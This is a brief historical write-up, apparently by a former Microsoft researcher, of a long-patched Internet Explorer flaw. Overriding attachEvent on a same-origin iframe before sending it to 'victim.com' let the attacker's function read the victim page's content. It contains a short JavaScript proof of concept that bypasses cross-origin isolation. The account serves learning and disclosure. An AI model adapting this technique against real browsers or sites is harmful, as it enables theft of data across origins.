By overriding a method on a same-origin IFrame’s window before redirecting it to another domain, I could inject a function that would fire in the new cross-origin context when the method was eventually called by the target page’s own scripts.

// Override attachEvent on the same-origin IFrame before redirecting
window[0].attachEvent = function() {
    alert(this.document.body.innerText); // Runs in the cross-origin context
};

// Redirect the IFrame to the victim domain
window[0].location = "http://www.victim.com/";

The victim page called attachEvent as part of its own initialization, but because the property had been overridden on the window object before the navigation, the attacker’s function ran with access to the new document. This was a case where IE did not clear property overrides on a window object when the origin changed.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.